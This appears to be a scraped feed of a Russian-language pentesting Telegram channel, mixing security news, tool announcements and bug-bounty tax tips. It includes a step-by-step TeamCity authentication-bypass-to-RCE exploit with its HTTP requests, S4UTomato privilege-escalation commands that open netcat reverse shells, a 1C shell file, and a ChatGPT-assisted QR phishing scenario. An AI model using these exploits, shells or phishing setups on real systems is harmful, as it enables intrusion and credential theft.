#websocket
"Краткость - сестра таланта" - именно так сказал Антон Павлович Чехов, и теперь говорю я. Сегодня, завтра и до конца дней площадки речь пойдет о WebSocket-ах: "Что это?", "Как работает?" и главное - "Как это взламывать?" (в целях этичного хакинга конечно). Начнем с простого и будем идти к более сложному, пробираясь через тернии к звёздам. Приятного чтения.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤1
Forwarded from sdnv's funk-hole
Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.
Я автоматизировал этот процесс благодаря консольной утилите
Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в
https://github.com/sdnv0x4d/rasoff
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.
Я автоматизировал этот процесс благодаря консольной утилите
rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в
.csv под каждый сервер. Более подробно в READMEhttps://github.com/sdnv0x4d/rasoff
GitHub
GitHub - sdnv0x4d/rasoff: 1C RAS Offensive Security Tool
1C RAS Offensive Security Tool. Contribute to sdnv0x4d/rasoff development by creating an account on GitHub.
🔥8❤2👍1
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
#xakep #cloudflare
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
💬 Канал | 📡 Хакер | ➡️ Более подробная информация
#xakep #cloudflare
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚13🔥5👾3👍1
Forwarded from Кавычка (Bo0oM)
Снова про #1С
Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."
В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.
Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.
>
Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."
В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.
Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.
>
❤🔥5❤2
Forwarded from Кавычка (Bo0oM)
Кавычка
Снова про #1С Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.". Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить…
КомандныйИнтерпретаторДля1С.epf
13 KB
❤7
Forwarded from Bounty On Coffee
Товарищи багхантеры! Я к вам с хорошими новостями, которые помогут вам сэкономить больше денег с выплат.
Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/
Но есть еще нюансы, которые кому-то могут помочь.
Для ИП на УСН для некоторых регионов есть льготы, а именно – это 1% на доход, шикарно же!
В список регионов с таким процентом входят:
- Республика Дагестан
- Мурманская область
- Ненецкая AO
И еще несколько регионов с процентом – 4. Подробная таблица здесь: https://e-kontur.ru/enquiry/276/check_usn
В итоге, если ваши выплаты переваливают за 1 млн рублей и у вас есть возможность оформить ИП в юрисдикции этих регионов, то вперед. Если меньше, то смысла нет, лучше не париться и сидеть на “самозанятом”.
К примеру, если вы получите выплат за 2023 год на 2 млн рублей:
- Самозанятый заплатит – 120к рублей
- ИП на УСН в льготном регионе – фиксированный страховой взнос – 45к, 1% на доход свыше 300к (но тут можно уменьшить это) - 17к и сам налог на доход – 20к = 77к. Чем больше выплат, тем больше экономия.
Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/
Но есть еще нюансы, которые кому-то могут помочь.
Для ИП на УСН для некоторых регионов есть льготы, а именно – это 1% на доход, шикарно же!
В список регионов с таким процентом входят:
- Республика Дагестан
- Мурманская область
- Ненецкая AO
И еще несколько регионов с процентом – 4. Подробная таблица здесь: https://e-kontur.ru/enquiry/276/check_usn
В итоге, если ваши выплаты переваливают за 1 млн рублей и у вас есть возможность оформить ИП в юрисдикции этих регионов, то вперед. Если меньше, то смысла нет, лучше не париться и сидеть на “самозанятом”.
К примеру, если вы получите выплат за 2023 год на 2 млн рублей:
- Самозанятый заплатит – 120к рублей
- ИП на УСН в льготном регионе – фиксированный страховой взнос – 45к, 1% на доход свыше 300к (но тут можно уменьшить это) - 17к и сам налог на доход – 20к = 77к. Чем больше выплат, тем больше экономия.
❤9
Bounty On Coffee
Товарищи багхантеры! Я к вам с хорошими новостями, которые помогут вам сэкономить больше денег с выплат. Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/ Но есть еще нюансы, которые кому-то могут помочь. …
Очень полезная информация для продвинутых хантеров. Спасибо Рамазану!
ChatGPT сейчас разве что в котлеты не кладут. В этой статье мы расскажем, как в проекте по социальной инженерии с помощью форка библиотеки для Gophish рассылать QR-коды вместо обычных ссылок, чтобы вытащить сотрудников из защищенного рабочего окружения на личные девайсы. В качестве catchy-сценария рассылки мы рассмотрим «Telegram-бот IT-поддержки с ChatGPT» и на самом деле используем эту нейросеть для генерации кода бота, а также подключим интеграцию с API OpenAI для общения с пользователями.
#xakep #chatgpt
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤2
Local Privilege Escalation glibc's ld.so (CVE-2023-4911)
➡️ Исследование
🔥 POC: https://github.com/leesh3288/CVE-2023-4911
#linux #lpe
💬 Канал | 📶 Github
#linux #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - leesh3288/CVE-2023-4911: PoC for CVE-2023-4911
PoC for CVE-2023-4911. Contribute to leesh3288/CVE-2023-4911 development by creating an account on GitHub.
🔥6
Forwarded from Monkey Hacker
Token that gives me power
Наверно кто-то слышал про новую проблему в JetBrains TeamCity, связанная с
В целом стоит начать, что
Ребята нашли интересный дифф в методе
Отсюда мы имеем следующий сценарий
Получаем токен администратора
С его помощью, мы теперь можем создать пользователя с админскими правами
Но, мы можем пойти дальше и докрутить до RCE. Первым делом включаем дебаг (токен здесь также потребуется)
Не забываем все это применить к текущему конфигу
И теперь мы имеем возможность исполнять команды
Не забываем удалять токен
Наверно кто-то слышал про новую проблему в JetBrains TeamCity, связанная с
RPC2В целом стоит начать, что
TeamCity используется для автоматизированной сборки и тестирования ПО. А он написан на JavaРебята нашли интересный дифф в методе
XmlRpcController.getPathSuffix. Точнее был прикол, связанный с wildcard path. Плюс TeamCity использует фреймворк Spring, а там существует интерцептор, который позволяет модифицировать входящие HTTP-запросы (thx to riven). По этим и другим причинам, любой входящий HTTP-запрос, имеющий путь /**/RPC2, не будет подвергаться проверке аутентификации. А значит мы можем использовать API-ручки для получения токенов почти любых пользователей и для дальнейшего создания собственного юзера. /app/rest/users/<userLocator>/tokens/<tokenName>Отсюда мы имеем следующий сценарий
Получаем токен администратора
POST /app/rest/users/id:1/tokens/RPC2С его помощью, мы теперь можем создать пользователя с админскими правами
POST localhost:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"monkey1\", \"password\": \"monkey\", \"email\": \"monkey\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.eWaBWGhGSFBZVHB4WvAxNEptVmhQUkkxN0VF.MjhmYTY2MjUtNjZhNy00OTQ0LTk4LmItYzI1N2Q3MjIwMzE2"Но, мы можем пойти дальше и докрутить до RCE. Первым делом включаем дебаг (токен здесь также потребуется)
POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=trueНе забываем все это применить к текущему конфигу
POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.propertiesИ теперь мы имеем возможность исполнять команды
POST /app/rest/debug/processes?exePath=idDELETE /app/rest/users/id:1/tokens/RPC2👍4❤3⚡1🔥1
#ai #chatgpt #offensive
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5👍3❤1
S4UTomato
#LPE #windows
Инструмент позволяющий выполнить повышение привилегий через Kerberos. Но главное отличие в том, что данный метод, хоть и схож с ранее известными методами privesc из семейства "Potato", но вместо использования COM-интерфейсов, здесь используется расширение S4U для получения билета службы для учетной записи администратора домена на локальной машине. Затем этот билет используется для создания системной службы и получения SYSTEM. Данный инструмент сочетает в себе сразу 3 техники
💻 Github repo
💬 Канал
#LPE #windows
Инструмент позволяющий выполнить повышение привилегий через Kerberos. Но главное отличие в том, что данный метод, хоть и схож с ранее известными методами privesc из семейства "Potato", но вместо использования COM-интерфейсов, здесь используется расширение S4U для получения билета службы для учетной записи администратора домена на локальной машине. Затем этот билет используется для создания системной службы и получения SYSTEM. Данный инструмент сочетает в себе сразу 3 техники
:
1. LEP via Resource-based Constrained Delegation (ссылка)S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"2. LEP via Shadow Credentials + S4U2self (ссылка)
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f3. LEP via Tgtdeleg + S4U2self (ссылка)
# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
][акер опубликовал призовые кейсы нашей премии Pentest award. Сохраняем их в одном посте, чтобы участникам в следующем году было достаточно референсов:
▪️Пробив периметра. Три райтапа победителя Pentest award в номинации «Пробив».
▪️Взлом Seedr. Райтап — победитель Pentest award в номинации «Пробив».
▪️Нескучные байпасы. Работы — победители Pentest award в номинации «Bypass».
▪️**ck the logic. Три исследования логических багов получившие Pentest award.
▪️LPE на казенном макбуке. Злоупотребляем установкой VS Code для локального повышения привелегий.
▪️ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота.
Еще раз благодарим всех авторов за качественный контент и смелость. Увидимся на Pentest award 2024 🫡
▪️Пробив периметра. Три райтапа победителя Pentest award в номинации «Пробив».
▪️Взлом Seedr. Райтап — победитель Pentest award в номинации «Пробив».
▪️Нескучные байпасы. Работы — победители Pentest award в номинации «Bypass».
▪️**ck the logic. Три исследования логических багов получившие Pentest award.
▪️LPE на казенном макбуке. Злоупотребляем установкой VS Code для локального повышения привелегий.
▪️ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота.
Еще раз благодарим всех авторов за качественный контент и смелость. Увидимся на Pentest award 2024 🫡
👍10🫡4🔥2
#bugbounty #pentest #web
Как я и люблю - мы начнем с условных основ и будем двигаться постепенно всё глубже и глубже. Ближе к концу разберём, как эксплуатировать. При написании статьи было использовано много разных источников. К чему это? А к тому, что я начну со слов, которые нашел в статье у Бума - про него будет дальше. Что ж, приятного чтения.
Race condition (состояние гонки) - это ситуация, при которой несколько потоков (или процессов) одновременно пытаются выполнить операции чтения или записи к общим ресурсам без должной синхронизации. Представить можно в формате очереди, один за одним.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10⚡1😎1